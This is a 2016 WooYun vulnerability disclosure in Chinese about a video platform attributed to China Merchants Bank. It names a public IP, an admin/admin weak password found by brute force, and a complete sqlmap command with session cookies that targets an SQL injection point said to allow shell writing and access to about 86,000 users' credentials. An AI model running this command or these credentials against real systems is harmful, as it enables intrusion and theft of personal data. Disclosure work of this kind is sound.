漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2016-0194868
漏洞标题:招商银行视讯平台漏洞
相关厂商:招商银行
漏洞作者: 苦咖啡
提交时间:2016-04-11 09:35
修复时间:2016-04-12 11:10
公开时间:2016-04-12 11:10
漏洞类型:用户资料大量泄漏
危害等级:中
自评Rank:10
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2016-04-11: 细节已通知厂商并且等待厂商处理中
2016-04-12: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
没什么说的就是一套视频直播系统 看起来还不错!!~~~
详细说明:
入口地址http://122.112.15.197 因为没有安全验证码 导致暴力破解出 账号admin密码admin的弱口令
进入系统看见上传点本来想的是直接上传脚本SHELL
但是看见文件格式做了限制 也难得去研究绕过了!!~~
上BURP看见很多POST随便拿一个
sqlmap.py -u "http://122.112.15.197/admin/user/inituserinfo.p
hp?username=admin&groupname=100000" --cookie "100000-admin=success; http://122.1
12.15.197/admin/upload.html?name=admin&gname=100000curtab=%23my-upload-tab;http:
//122.112.15.197/admin/channel.html?name=admin&gname=100000curtab=%23passway323;
jstree_select=%23tree_node_7;jstree_open=%23tree_node_2%2C%23tree_node_7; jstre
e_load=" --data "username=admin" -p username
此注入点支持union 而且权限很大 可以直接写SHELL
漏洞证明:
哎呀 浏览器出问题了 本来想在截图个的都没法了
用户数量8.6W 编辑每个用户的信息可以实现遍历
每个用户包含的信息有:
用户名(其实就是每个员工的真名缩写)(其实这8W多用户名估计是招行的所有系统几乎通用的用户名形式)
用户密码
用户邮箱
不看了 夜深了 睡觉了!!~~~本来想SHELL证明下的 算了
修复方案:
版权声明:转载请注明来源 苦咖啡@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2016-04-12 11:10
厂商回复:
感谢你对招行的关注,经过确认非招行地址,已经通知相关负责人处理。
最新状态:
暂无